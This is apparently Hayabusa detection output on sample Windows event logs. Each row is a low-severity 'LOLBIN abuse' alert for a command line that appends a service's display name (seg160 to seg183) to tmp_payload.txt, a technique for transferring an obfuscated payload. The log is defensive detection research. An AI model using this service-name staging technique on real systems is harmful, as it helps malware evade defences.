2021-11-03 17:38:20.064 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:22.968 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:22.984 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:24.421 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:24.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:25.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:25.884 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:27.322 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:27.338 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:31.756 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:31.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:36.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:36.138 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:40.532 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:40.547 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:44.878 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:44.893 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:50.726 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:50.742 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
